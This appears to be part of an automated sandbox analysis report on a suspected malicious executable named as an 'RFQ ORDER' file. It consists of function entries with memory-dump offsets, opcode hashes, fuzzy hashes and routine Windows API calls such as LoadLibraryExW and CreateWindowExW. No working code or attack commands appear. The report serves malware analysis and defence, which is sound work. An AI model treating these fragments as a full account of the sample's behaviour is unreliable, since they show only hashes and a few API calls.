                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9a2ee240c0e817e7f70ccb5ac98e2c606594bcd883381650f8ed281497b72bef
                        • Instruction ID: 63f7d1b082209e35ef0611d8dd07e4ee13926d90bacf9dd2d98497e90c45228f
                        • Opcode Fuzzy Hash: 9a2ee240c0e817e7f70ccb5ac98e2c606594bcd883381650f8ed281497b72bef
                        • Instruction Fuzzy Hash: B5317878700A248FC714EB69C8A4A6A73A6FF89218B1144A9E506CF3B5DF34EC01CB95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A37F8, Relevance: .1, Instructions: 79COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e550c91f5c9b28da6f8b32df954ad58444ccffdc1aab6c1e459ca68aa2bb241a
                        • Instruction ID: fd6c6537e558b9609d079489a708560c15351cfb43ba28f4b15f6a1e4e61556c
                        • Opcode Fuzzy Hash: e550c91f5c9b28da6f8b32df954ad58444ccffdc1aab6c1e459ca68aa2bb241a
                        • Instruction Fuzzy Hash: 6621A078B046058FC710EFA8D895AAEB7F2EF89200B10496AE546DB361DB70EC05CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A27A8, Relevance: .1, Instructions: 70COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e8007ce5f3b147559f03aa1a9bace9917a7fdcdc4f3e86393257dd912e2c9212
                        • Instruction ID: d186704898368ce2532780440cfcffbe013c0d5ea20b18f9d13020de319de7aa
                        • Opcode Fuzzy Hash: e8007ce5f3b147559f03aa1a9bace9917a7fdcdc4f3e86393257dd912e2c9212
                        • Instruction Fuzzy Hash: 0121F335B046158FCB15EF69E84497FB7EAEFD4315B05482AE906CB341DB70EC029BA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034AB82F, Relevance: .1, Instructions: 66COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ff44a6fff50e0b22c8ff1860b1018fe3282bb7e7689134d031ed0b7e121cbaa3
                        • Instruction ID: 613421f652bd78369a4508209aa94ae812e472ea9fa2751db3f6899ce3bffddd
                        • Opcode Fuzzy Hash: ff44a6fff50e0b22c8ff1860b1018fe3282bb7e7689134d031ed0b7e121cbaa3
                        • Instruction Fuzzy Hash: F501B53170D7500FD3579B39286457ABFA6EED612070A40ABE545DF2A3DE648C068355
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A6510, Relevance: .1, Instructions: 65COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f33ebe7a2a6a502748914437dd6193b64a8c00bc557be1806b246b8f10b0d159
                        • Instruction ID: 790ae7be185906adc14f6eb17364ec8b49c490be42ad4b48ed0b9e4fb6b220ac
                        • Opcode Fuzzy Hash: f33ebe7a2a6a502748914437dd6193b64a8c00bc557be1806b246b8f10b0d159
                        • Instruction Fuzzy Hash: 7011AC75704A008FC728DB6DE48492EB7F7AB99214B1E446BE106CF361CB75EC41CB55
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A44E1, Relevance: .1, Instructions: 62COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 04f2aec1fdf14c408c0524d5681bcc856fc27a027c5e471dc350acefe825b283
                        • Instruction ID: f8ed94b116a65d07490d443306794c782c438634314b5444aaf1d7e84c33c3f6
                        • Opcode Fuzzy Hash: 04f2aec1fdf14c408c0524d5681bcc856fc27a027c5e471dc350acefe825b283
                        • Instruction Fuzzy Hash: 461165717093809FC712DB58E8A4B997BF1DF87208B0E04DAC4C5CB663CA21AC4AC711
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034AABB0, Relevance: .1, Instructions: 60COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 848b7d1bdb350cca678d3fe320fb99805919058493d41c3217a8351c5e8ee655
                        • Instruction ID: 4838a81426dd9d6b11d066981034346ecaf38c31a6cd27a7f50084fb768149dd
                        • Opcode Fuzzy Hash: 848b7d1bdb350cca678d3fe320fb99805919058493d41c3217a8351c5e8ee655
                        • Instruction Fuzzy Hash: CC11C435B01605CFC706DF64E8559ADB7B2EF84205B2481AAD40ADF3A2DB30AE01CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A4410, Relevance: .1, Instructions: 58COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5765ad58a8b3749cca77f50ecde33a8bfe93c51d9252aab63427228f805492ec
                        • Instruction ID: 68434909b9b50c5392d69fbbf1a802544a59030730095f0514c32ea58b9e5647
                        • Opcode Fuzzy Hash: 5765ad58a8b3749cca77f50ecde33a8bfe93c51d9252aab63427228f805492ec
                        • Instruction Fuzzy Hash: 18117F75200A008FC324CF6ED59490AFBF5FF596143154AAEE58ACBB22D670FC49CB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A2A47, Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 777aecb42f25f0aa3bfbecf8b119a2407d4412ad29f97dbcd50f13c0dd85a870
                        • Instruction ID: 768f1839d8e42b5d0d4321d384ce136625c11626be1bd92cb276a3f97b6e8824
                        • Opcode Fuzzy Hash: 777aecb42f25f0aa3bfbecf8b119a2407d4412ad29f97dbcd50f13c0dd85a870
                        • Instruction Fuzzy Hash: E31120343093108FC720EB28D854A6B7BFAEFC5305B14882EE0828BB52CBB5EC058F50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A1B70, Relevance: .1, Instructions: 54COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 49771701e7ac494ef73bbec31997dcdecf4632366de9ae7edeac59040cda7f29
                        • Instruction ID: 36e6630d3ea467a4b6a848c6ce27c954971e46eb0b94d21ac92f6d87300951b3
                        • Opcode Fuzzy Hash: 49771701e7ac494ef73bbec31997dcdecf4632366de9ae7edeac59040cda7f29
                        • Instruction Fuzzy Hash: B4112275301A118FC718DF29D588D26BBF5EF8A62531946A9E44ACBB71CB30EC02CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A2E38, Relevance: .1, Instructions: 54COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a0add3899988130e4c9b0bb75745e8b87fc1ade71666eabb479754385790581d
                        • Instruction ID: e75cb1a40c3b3f2555c2bfb2f9c1481b05c0b47592821b9bbdd4e92614c73004
                        • Opcode Fuzzy Hash: a0add3899988130e4c9b0bb75745e8b87fc1ade71666eabb479754385790581d
                        • Instruction Fuzzy Hash: 4701D67BB042140B5714A67EA44066FB7DBDBF82B17148637FA1ACB395EE70CC119368
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A5078, Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7fcffbd3b4f23442c261518d0a04c5d1c5e23a2314d570b60ebdcf01a1ac4e6a
                        • Instruction ID: 3871174e2f8738ae2aa2464be6ca6fdf4a528ee54a161cf19132abbc6fa991c1
                        • Opcode Fuzzy Hash: 7fcffbd3b4f23442c261518d0a04c5d1c5e23a2314d570b60ebdcf01a1ac4e6a
                        • Instruction Fuzzy Hash: 7901A134704A148F8B04EB3DE95892EBBE6EB8921131484BAE50ACF365CF30DC05CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A5067, Relevance: .1, Instructions: 52COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 898a9f912ad6fc2ff67843402545fde96b24081afeec27987607a5534a4e8cd1
                        • Instruction ID: d5c838009b5f64f400ef34ddb0ccd003aae43f4ff7a48986ffc2f0ba1216c28a
                        • Opcode Fuzzy Hash: 898a9f912ad6fc2ff67843402545fde96b24081afeec27987607a5534a4e8cd1
                        • Instruction Fuzzy Hash: D411A5357086448FC704DF3DD958D6ABBF5EB9A21131484BBE54ACB366CA31DC05DB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A4420, Relevance: .0, Instructions: 50COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7caf8cfde3aa6f736e7b1f3e01d5276a165d86b3bab57133d9254b0d3801b8a8
                        • Instruction ID: b0a26906613fde9db60eada76cbca876a9c8c64d8b246bb09a7b52df9c3330fa
                        • Opcode Fuzzy Hash: 7caf8cfde3aa6f736e7b1f3e01d5276a165d86b3bab57133d9254b0d3801b8a8
                        • Instruction Fuzzy Hash: 42117CB5200A008F8334CF6ED584806FBF5FF586103150AAEE58ACBB22D670FC49CB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A2A58, Relevance: .0, Instructions: 50COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dfc1171af970d6a37998d8bbcef8aa826e802e13beb8a07e033d0f91886fbeaa
                        • Instruction ID: 10ebb2315ceadc12f39d81c55488c812c8d6ba4b6fbe2640459fdf1cde33dbea
                        • Opcode Fuzzy Hash: dfc1171af970d6a37998d8bbcef8aa826e802e13beb8a07e033d0f91886fbeaa
                        • Instruction Fuzzy Hash: 1101DE353107249FC724EB29D858A6BBBFAFBC8315B00882EE5428B741CB75EC418B64
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034ABA70, Relevance: .0, Instructions: 47COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 25228b5042d401729d961fa33fe596bcb3b723fe0d1d7afc0ee2112f5c363db1
                        • Instruction ID: 8324d42101c85d60833de6ad200b983d756381487ce43974b9639b5fd04f77d0
                        • Opcode Fuzzy Hash: 25228b5042d401729d961fa33fe596bcb3b723fe0d1d7afc0ee2112f5c363db1
                        • Instruction Fuzzy Hash: 0BF0AF323195548FD315CB1DF8488A9BBA5FF9437471441ABE419CB362CA619D068B94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A8E38, Relevance: .0, Instructions: 47COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e87c73e2009a2dc60fff7df9fbc3ba5a6384ebd59e2638f6fb7ae820db5327e4
                        • Instruction ID: b377bdd3e2116b935d98f6bce548660a6f5414c2468485a0414d83bd580fc1ff
                        • Opcode Fuzzy Hash: e87c73e2009a2dc60fff7df9fbc3ba5a6384ebd59e2638f6fb7ae820db5327e4
                        • Instruction Fuzzy Hash: 7DF06D3A3002148BC304EA7AE49095AB7A6EFC5219314847FE60A8F766DF71EC058794
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0355D005, Relevance: .0, Instructions: 47COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422497216.000000000355D000.00000040.00000001.sdmp, Offset: 0355D000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c01997a7c7314ec2bec4656d4938483a654767a55141ab3335d37e0440c38f92
                        • Instruction ID: 3eb0d245014e545e188c03e1a7d151d0d1a71bcf1f1731ca89cebc9b121aa049
                        • Opcode Fuzzy Hash: c01997a7c7314ec2bec4656d4938483a654767a55141ab3335d37e0440c38f92
                        • Instruction Fuzzy Hash: 9D01406240D3C45FD7128B259CA4752BFB8EF43224F1980DBED848F2A7D2695C49C772
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A1B80, Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 54c623f93dda4839a1c4e12df556af9a58dae88205fa107463c33700fb3c9654
                        • Instruction ID: 4ce5c80933912de37240065097ff2cd143af14b860024eb0fe56722d3d753753
                        • Opcode Fuzzy Hash: 54c623f93dda4839a1c4e12df556af9a58dae88205fa107463c33700fb3c9654
                        • Instruction Fuzzy Hash: B401B075301A118FC718DF29D598D26B7F5BF8961531546ADE50ACBB31DB70EC01CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0355D01D, Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422497216.000000000355D000.00000040.00000001.sdmp, Offset: 0355D000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7e0107ade4ebf2eecaa1e890ca4383588b07d4e41a223a9b2f5b11792e6c8eea
                        • Instruction ID: f69fcd4e6ea9caeffa5964da2a738136b05e792c8195869c259027d7287e4a0b
                        • Opcode Fuzzy Hash: 7e0107ade4ebf2eecaa1e890ca4383588b07d4e41a223a9b2f5b11792e6c8eea
                        • Instruction Fuzzy Hash: 84018473408340AAE7209A26E894B66FBECFF41268F18845AFD055B266D379A845C6B1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A4528, Relevance: .0, Instructions: 26COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 861a344e2d9841a7a060687f94d5820452fe8bf94c5d36352d56097fd255c592
                        • Instruction ID: 3a1fbc36037f47823b9ae180b964627cbd93bfc68b55e686dde7e9c35283b84f
                        • Opcode Fuzzy Hash: 861a344e2d9841a7a060687f94d5820452fe8bf94c5d36352d56097fd255c592
                        • Instruction Fuzzy Hash: 32E0D8327003004F8710EB5EE484C2BB7EA9BC8525308806AE10DC7312CE60DC098791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034AABC0, Relevance: .0, Instructions: 19COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 52b7687808298c4065ec6f83e3e754920ca1ff0b1c85e292a973bd8fcd3b4af2
                        • Instruction ID: 6fd0010c8ca28dcebc6ecd7e0cd4a1b143cc3815d91966501749c662095fc322
                        • Opcode Fuzzy Hash: 52b7687808298c4065ec6f83e3e754920ca1ff0b1c85e292a973bd8fcd3b4af2
                        • Instruction Fuzzy Hash: B3E08674A0030CEBC741EFA0E511A9DB7B6EB81245F1145E9E80EEB251EF316E009750
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A0814, Relevance: .0, Instructions: 18COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ec1fb29090c0eb497cccd3fa46481543f81b9f68ff6067e927eacdbd78eed0d7
                        • Instruction ID: 49c105a8e1cfabf3b94cf34a34df3a4fbb6c913832700b87d27f7aa0ec5d5c20
                        • Opcode Fuzzy Hash: ec1fb29090c0eb497cccd3fa46481543f81b9f68ff6067e927eacdbd78eed0d7
                        • Instruction Fuzzy Hash: 76E04F39610018DFCB00DF54E8889ADBB71FF84311F104056E901A7361C7309955CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A1B4D, Relevance: .0, Instructions: 12COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a0c69d97c7051fb0ac25969e4ddb72438f5de9538eea6b10613dbf74b89de2b3
                        • Instruction ID: 7561105c9b8835e03718204407373a3ec39e5fc8c5b67333ad590109eb77e8a4
                        • Opcode Fuzzy Hash: a0c69d97c7051fb0ac25969e4ddb72438f5de9538eea6b10613dbf74b89de2b3
                        • Instruction Fuzzy Hash: 11D0C92100D3C04FCB079B24DD695813FB1BE5314035A55C6C0808B5A7C22458CADF61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034AC3D0, Relevance: .0, Instructions: 11COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ada73dc44972f4321f8e46496570a4d7caa1c37be45049854a8e3430faee6037
                        • Instruction ID: 69cb03572299623a504afacdc40f617bc470a2f9081a3c33f64300b3234bcf97
                        • Opcode Fuzzy Hash: ada73dc44972f4321f8e46496570a4d7caa1c37be45049854a8e3430faee6037
                        • Instruction Fuzzy Hash: BFD012B1508344DFC301DB68E5588253BB4DF0761174180D6F808CB172D665EC149715
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A4DCB, Relevance: .0, Instructions: 9COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bbf9308e65f49850baae2ffd31ef990ce531c34d31b4d045a5f20e5f2b5f5a66
                        • Instruction ID: 057231c999417d359e0eed661a8a40fcf26c917f9783c2457d31a91db813ee64
                        • Opcode Fuzzy Hash: bbf9308e65f49850baae2ffd31ef990ce531c34d31b4d045a5f20e5f2b5f5a66
                        • Instruction Fuzzy Hash: 19B01233784510874C05214E700446EE356E7D007B3100463E32ACC6448E524C530584
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034AC3E0, Relevance: .0, Instructions: 7COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 79a13f34584defdca235b799d1b828a2c8c31dd1e8bba79713e0f379b1fe5d5a
                        • Instruction ID: 3500fcb77b3068117070a2755b6df40992440358c719d221bb354a181ae4356b
                        • Opcode Fuzzy Hash: 79a13f34584defdca235b799d1b828a2c8c31dd1e8bba79713e0f379b1fe5d5a
                        • Instruction Fuzzy Hash: 22B092311502088F83009B68E548C0137A8AB08A143110090E1088B232C621F8008A51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Analysis Process: #RFQ ORDER7678432213211.exe PID: 1328 Parent PID: 4900 #RFQ ORDER7678432213211.exeCOMMON

                        Executed Functions

                        Function 014593E8, Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000), ref: 0145962E
                        Memory Dump Source
                        • Source File: 00000012.00000002.483535165.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: c629331ccca1fa510ce3aebe700f8ecc26efe575a4a637ddc0fa943f82cd7d46
                        • Instruction ID: 87785103411473d2c61124ae457e29baaa3b5851808bdb63639763142087b328
                        • Opcode Fuzzy Hash: c629331ccca1fa510ce3aebe700f8ecc26efe575a4a637ddc0fa943f82cd7d46
                        • Instruction Fuzzy Hash: CF712470A00B058FD7A4DF2AD44075BBBF5BF89208F008A2ED98AD7B51DB75E805CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0145FB20, Relevance: 1.7, APIs: 1, Instructions: 182COMMON
                        Download Yara Rule
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0145FD0A
                        Memory Dump Source
                        • Source File: 00000012.00000002.483535165.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: d686a5704db4697c7fc7193794b5192aff1fc4737a151516019f5372efb3ffa3
                        • Instruction ID: ab3afb1023bfc0cfdece0c92b0a709c47179de6430046c4ff07edfe8b96aa35f
                        • Opcode Fuzzy Hash: d686a5704db4697c7fc7193794b5192aff1fc4737a151516019f5372efb3ffa3
                        • Instruction Fuzzy Hash: 3B6176B1C043489FDB15CFA9C890ACEBFB1FF49310F18816AE815AB222D7349849CF52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0145FB98, Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                        Download Yara Rule
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0145FD0A
                        Memory Dump Source
                        • Source File: 00000012.00000002.483535165.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: dc5d5525a70e080d60e35d6bf9f2e5e8c78c3374f0011c0bd04cf9c2150cf76b
                        • Instruction ID: eecf26e606a0cd473f0c1689656f7e79eba9996b674727f70fb829381b6a6e27
                        • Opcode Fuzzy Hash: dc5d5525a70e080d60e35d6bf9f2e5e8c78c3374f0011c0bd04cf9c2150cf76b
                        • Instruction Fuzzy Hash: 735110B1C04249AFDF15CFA9C880ADEBFB1FF48314F24816AE919AB221D7719849CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0145DA04, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                        Download Yara Rule
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0145FD0A
                        Memory Dump Source
                        • Source File: 00000012.00000002.483535165.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: 6874827ce3d59ebd127b1a11598c47f9976910e89e2224527f03ee67f4999f0d
                        • Instruction ID: 3667293adef346650e967d54f93ae36d59891fd91b8288bf16097aadb1bbecd1
                        • Opcode Fuzzy Hash: 6874827ce3d59ebd127b1a11598c47f9976910e89e2224527f03ee67f4999f0d
                        • Instruction Fuzzy Hash: 5451D1B1D00309DFDB14CF99D884ADEBBB5FF48314F64812AE819AB221D7709849CF91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0145A14C, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                        Download Yara Rule
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0145BCC6,?,?,?,?,?), ref: 0145BD87
                        Memory Dump Source
                        • Source File: 00000012.00000002.483535165.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: d13e71c4098b06d089503d8c72f5bdcd670832c684e4d27e0890aefff3f1f5f6
                        • Instruction ID: 476bad451f863ab4b77f442ee8c6b82e50909cb2a371064c8d403969c9069441
                        • Opcode Fuzzy Hash: d13e71c4098b06d089503d8c72f5bdcd670832c684e4d27e0890aefff3f1f5f6
                        • Instruction Fuzzy Hash: DF21E5B5900208EFDB10DFAAD884AEEBBF5EB48324F14841AE954B3311D374A945CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0145BCF9, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                        Download Yara Rule
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0145BCC6,?,?,?,?,?), ref: 0145BD87
                        Memory Dump Source
                        • Source File: 00000012.00000002.483535165.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 747642ee4d5f6945e23b5c1643710342b73a2c067644cce4e2a139c7fd60d619
                        • Instruction ID: 4846a708e4a76be86ab418c281094684de57fc671c4502ecdda67940b9c68027
                        • Opcode Fuzzy Hash: 747642ee4d5f6945e23b5c1643710342b73a2c067644cce4e2a139c7fd60d619
                        • Instruction Fuzzy Hash: FC21E3B59002589FDB10CFA9D584AEEFBF4FB48324F15841AE954B7311C378A944CF61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01458768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,014596A9,00000800,00000000,00000000), ref: 014598BA
                        Memory Dump Source
                        • Source File: 00000012.00000002.483535165.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 75f45f687ab05007c5528d7c507d131238d302fba1c93a9a01537eba2656c9d4
                        • Instruction ID: 7dd815eda64bedefa533fcb7b8e1a526d5e42de7c413ae575f3b47f833973088
                        • Opcode Fuzzy Hash: 75f45f687ab05007c5528d7c507d131238d302fba1c93a9a01537eba2656c9d4
                        • Instruction Fuzzy Hash: E811F2B6900209DBDB10DF9AC484BDEFBF4EB48324F14842AE915B7710C375A945CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01459849, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,014596A9,00000800,00000000,00000000), ref: 014598BA
                        Memory Dump Source
                        • Source File: 00000012.00000002.483535165.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 4304c3b01946b2db26e5ad96750b86430f8e1d38f7a56aedaa095c65215af8f3
                        • Instruction ID: 6eb0a38deda6c9d788a6dc06f3c0691ef44224d3baebe99105164a8779a405b1
                        • Opcode Fuzzy Hash: 4304c3b01946b2db26e5ad96750b86430f8e1d38f7a56aedaa095c65215af8f3
                        • Instruction Fuzzy Hash: AF11F2B6800209DBDB10CF9AC444ADEFBF4EB88324F14842AE919A7710C379A545CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 014595C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000), ref: 0145962E
                        Memory Dump Source
                        • Source File: 00000012.00000002.483535165.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 6f46485cbdbfac8a494703e9627e819cf8a3f920beafc3414c0b2db7c7c6cabd
